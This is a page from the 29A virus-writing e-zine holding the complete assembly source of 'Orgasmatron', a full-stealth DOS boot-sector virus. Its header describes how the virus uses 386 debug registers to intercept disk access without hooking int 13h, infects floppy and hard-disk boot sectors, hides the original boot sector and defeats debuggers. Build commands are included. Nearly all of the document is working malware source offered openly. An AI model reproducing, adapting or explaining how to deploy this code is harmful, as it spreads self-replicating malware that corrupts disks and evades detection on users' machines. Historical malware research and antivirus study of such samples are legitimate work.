Copy Link
Add to Bookmark
Report
29A Issue 02 05 07
;
; ÜÛÛÛÛÛÜ ÜÛÛÛÛÛÜ ÜÛÛÛÛÛÜ
; [Orgasmatron] by Vecna/29A ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ
; A research full-stealth boot virus ÜÜÜÛÛß ßÛÛÛÛÛÛ ÛÛÛÛÛÛÛ
; which uses 386+ PMODE features ÛÛÛÜÜÜÜ ÜÜÜÜÛÛÛ ÛÛÛ ÛÛÛ
; ÛÛÛÛÛÛÛ ÛÛÛÛÛÛß ÛÛÛ ÛÛÛ
;
; A lot of help and code by Eternal Maverick/SGWW.
;
; This virus is the first boot virus ever that doesn't hook int 13h in order
; to infect and stealth its tracks. It only hooks int 1, to manage the hard-
; ware debug breakpoints, and int 8, to constantly monitor any changes which
; happen in int 1, to prevent disabling our handler, and setting the debug
; breakpoint at the int 13h entry point.
;
; When the computer is booted from an infected floppy, the virus will first
; check if the computer is 386+, by means of int 6 (invalid opcode). If it's
; a 286 or even a lower machine, it will return the control to the original
; boot. Else, it will hook int 1 and int 8.
;
; The task performed by int 8 is not to allow any changes in 0:4 (int 1),
; fixing it if necessary, and set DR3 to point to the BIOS entry point for
; int 13h. I use DR3, the last of the debug breakpoints, because it's less
; likely to be overwritten by other programs. Debuggers and other programs
; that use int 1 or hardware debug breakpoints, like Soft-ICE or Windows95,
; will either crash, don't work, or don't let the virus work.
;
; When int 1 is called, our handler checks if it comes from an int 1 opcode
; (0xcd, 0x01 or 0xf1), from single step, or from a hardware debug break-
; point. If it is a debug breakpoint, and it comes from "our" DR3, the virus
; will infect the floppy or stealth it in case it's already infected. Orgas-
; matron infects the boot sector in HDs and floppies. The original boot is
; put in the last sector of the first track in harddrives, and in the last
; sector of the root dir in floppies. This will allow it to work with any
; floppy size.
;
; As you could read in the heading, Orgasmatron is the very first boot virus
; ever which uses 386+ PMODE features and works in protected mode, making it
; much more versatile and advanced.
;
; Lots of help and bug fix by Eternal Maverick/SGWW.
;
; No greetings this time... ;)
;
; tasm /m /la orgasmat.asm
; tlink orgasmat.obj
; exe2bin orgasmat.exe orgasmat.bin
.model tiny
.code
.8086
org 0h
start proc
jmp loco
nop
endp start
bpb struc
bpb_oem db 8 dup (?)
bpb_b_s dw ?
bpb_s_c db ?
bpb_r_s dw ?
bpb_n_f db ?
bpb_r_e dw ?
bpb_t_s dw ?
bpb_m_d db ?
bpb_s_f dw ?
bpb_s_t dw ?
bpb_n_h dw ?
bpb_h_d dw ?
bpb_sht db 20h dup (?)
bpb ends
boot bpb <>
loco proc
cli
sub ax, ax
mov ss, ax
mov sp, 7c00h
push cs
pop ds
dec word ptr ds:[413h]
int 12h
mov cl, 10
ror ax, cl
mov es, ax
xor di, di
mov si, sp
mov cx, 0100h
rep movsw
push es
mov ax, offset strtovr
push ax
retf
endp loco
strtovr proc
mov byte ptr cs:[i13InUse], 0
push dword ptr ds:[6*4]
cmp word ptr ds:[1Ch*4],offset int1C
je is286orlower
mov word ptr ds:[6*4], offset is286orlower
mov word ptr ds:[6*4+2], cs
.386p
mov eax, dword ptr ds:[13h*4]
mov dword ptr cs:[old13], eax
mov eax, dword ptr ds:[1Ch*4]
mov dword ptr cs:[old1C],eax
mov word ptr ds:[1Ch*4],offset int1C
mov word ptr ds:[1Ch*4+2],cs
jmp installed
.8086
is286orlower:
inc word ptr ds:[413h]
installed:
pop dword ptr ds:[6*4]
sti
push ds
pop es
retry:
xor ax, ax
int 13h
mov ax, 0201h
mov bx, 7c00h
call setcxdxdo13
jc retry
db 0eah
dw 07c00h
dw 0h
endp strtovr
.386p
setcxdxdo13 proc
push ax
cmp dl, 80h
je harddrive
floppydrive:
mov cx, word ptr es:[bx.bpb_r_e+3]
shr cx, 4
movzx ax, byte ptr es:[bx.bpb_n_f+3]
mul word ptr es:[bx.bpb_s_f+3]
add cx, ax
inc cx
sub cx, word ptr es:[bx.bpb_s_t+3]
mov dh, 1
jmp goexit
harddrive:
mov ah, 8
int 13h
and cx, 0111111b
mov dx,80h
goexit:
pop ax
int13 proc
pushf
db 9ah
old13 equ this dword
dd ?
endp int13
ret
endp setcxdxdo13
setdr proc
push ds
pushad
push 0
pop ds
mov word ptr ds:[1*4], offset int1
mov word ptr ds:[1*4+2], cs
mov byte ptr cs:[change], 90h
movzx eax, word ptr cs:[old13]
movzx ebx, word ptr cs:[old13+2]
shl ebx, 4
add ebx, eax
mov dr3, ebx
mov eax, dr7
or al, 010000000b
mov dr7, eax
popad
pop ds
ret
endp setdr
int1C proc
cmp byte ptr cs:[i13InUse], 0
jne int1isrunning
call setdr
int1isrunning:
db 0eah
old1C dd ?
endp int1C
int1 proc
push eax
mov eax, dr6
mov dword ptr cs:[savedr6], eax
xor eax, eax
mov dr6, eax
mov eax, dr7
and al, not 010000000b
mov dr7, eax
pop eax
nop
change equ byte ptr $ -1
endp int1
debug proc
push eax
push ds
push cs
pop ds
inc byte ptr [i13InUse]
mov eax, -1
savedr6 equ dword ptr $-4
test ax, 0100000000001000b
jz done
mov byte ptr [change], 0cfh
cmp cx, 1
jne done
cmp dl, 80h
jb floppy
cmp dh,1
je bootaccess
jmp short done
floppy:
or dh,dh
jne done
bootaccess:
pop ds
pop eax
add sp, 6
call int13
pushf
push ax
jc error
cmp word ptr es:[bx+offset mymark], '**'
mymark equ word ptr $ -2
je stealth
mov ax, 0301h
call setcxdxdo13
jc error
pusha
push es
push ds
push es
pop ds
push cs
pop es
mov di, offset boot
lea si,[bx+3]
mov cx, 3bh
cld
rep movsb
mov ax, 0301h
xor bx, bx
inc cx
mov dh, 1
cmp dl, 80h
je winchester
mov dh, 0
winchester:
call int13
pop ds
pop es
popa
stealth:
mov ax, 0201h
call setcxdxdo13
error:
dec byte ptr cs:[i13InUse]
pop ax
popf
retf 2
done:
dec byte ptr [i13InUse]
pop ds
pop eax
iret
endp debug
i13InUse db -1
db 0, 0, '-=ðORGASMATRONð=-', 0, 0
org 01feh
db 55h,0aah
buffer equ this byte
end start
